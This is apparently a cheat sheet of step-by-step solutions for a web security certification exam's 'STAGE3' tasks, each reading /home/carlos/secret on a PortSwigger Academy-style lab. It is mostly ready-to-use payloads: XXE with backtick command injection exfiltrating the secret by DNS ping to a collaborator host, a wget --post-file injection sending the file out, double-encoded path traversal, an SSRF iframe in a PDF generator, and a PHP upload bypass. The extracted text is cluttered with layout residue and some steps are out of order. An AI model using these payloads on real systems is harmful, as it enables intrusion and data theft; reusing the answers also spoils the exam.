VA 19 12
VA 19 12

6. Submit the solution.


7. STAGE3 solved!
V 1 1

Sample lab from Burp Academy

https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration
VA A19 912 2

STAGE3.APP3 – XXE with command injection to read “/home/carlos/secret” file

1. If there is a file upload (add users) with .xml file upload, and you have already tried STAGE3.APP2
VA 19 12

– XXE with external DTD to read “/home/carlos/secret” file and it doesn’t work, this is the
vector.
VA 19 12

2. Create a .xml file with the following payload, make sure to replace the Burp collaborator
VA 19 12

instance ID:
VA 19 12

<?xml version="1.0" encoding="UTF-8"?>


VA 19 12

<users>
VA 19 12

<user>
<username>Example1</username>
VA 19 12

<email>`0&amp;ping $(cat /home/carlos/secret).your-burp-


VA 19 12

collaborator-instance-id.net &amp;`</email>
</user>
VA 19 12

<user>
VA 19 12

<username>&xxe;</username>
<email>[email protected]</email>
VA 19 12

</user>
VA 19 12

</users>
VA 19 12

3. Upload the .xml file. You will receive a server error while trying to upload the file but just ignore
VA 19 12

that.
VA 19 12

4. Poll your collaborator and note the solution in the DNS request.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

5. Submit the solution.


VA 19 12

6. STAGE3 solved!
VA 19 12
VA 19 12

Sample lab from Burp Academy


VA 19 12

https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE3.APP4 – LFI in image file path to read “/home/carlos/secret” file

1. If you see Admin panel only have images and no “Img-Size” parameter in the image URL, this is
VA 19 12

the vector.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

2. Append the following payload to read “/home/carlos/secret” file to above URL. The parameter
might be different depending on the lab you get. Note that word “secret” is double encoded to
VA 19 12

bypass blocklist.
VA 19 12
VA 19 12

GET
/admin/adminimg?imagefile=..%252f..%252f..%252f..%252f..%252f..%252f..%
VA 19 12

252f..%252f/home/carlos/%2573ecret
VA 19 12

3. In the response, locate the solution.


VA 19 12

4. Submit the solution.


VA 19 12

5. STAGE3 solved!
VA 19 12

Sample lab from Burp Academy


VA 19 12

https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE3.APP5 – OS command injection to read “/home/carlos/secret” file

1. If you see Admin panel only have images and with “Img-Size” parameter in the image URL, this is
VA 19 12

the vector.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

2. Append the following payload to the image size parameter. The parameter might be different
VA 19 12

depending on the lab you get.


VA 19 12

imagesize="`/usr/bin/wget%20--post-
VA 19 12

file%20/home/carlos/secret%20https://your-collaborator-instance-
VA 19 12

id.burpcollaborator.net/`"
VA 19 12

3. Poll your collaborator and the solution should be in the body of a POST request.
4. Submit the solution.
VA 19 12

5. STAGE3 solved!
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE3.APP6 – SSRF to read “/home/carlos/secret” file

1. If you see a PDF report download option in the Admin panel, this is the vector.
VA 19 12

2. Download the report and intercept the request.


VA 19 12

3. Modify the request body to the following payload and forward the request:
VA 19 12

{"table-html":"<div><p>Report Heading</p><iframe
VA 19 12

src='http://localhost:6566/home/carlos/secret'"}
VA 19 12

4. Download the PDF and the solution will be in the report.


VA 19 12

5. Submit the solution.


VA 19 12

6. STAGE3 solved!
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE3.APP7 – File upload bypass to upload a .php file to read “/home/carlos/secret” file

1. If there is an image upload via URL in the admin panel, this is the vector.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

2. Go to exploit server and create the exploit file with the following payload.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

<?php echo file_get_contents('/home/carlos/secret'); ?>


VA 19 12

3. Go to the file upload function, paste exploit URL, click save and intercept the request.
4. Add %3f%2f.jpg after .php and forward the request. The file will be uploaded.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1

5. Go to the uploaded file (/exploit.php) and retrieve the solution.


VA A19 912 2
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

7. STAGE3 solved!
VA 19 12

6. Submit the solution.


VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1

You might also like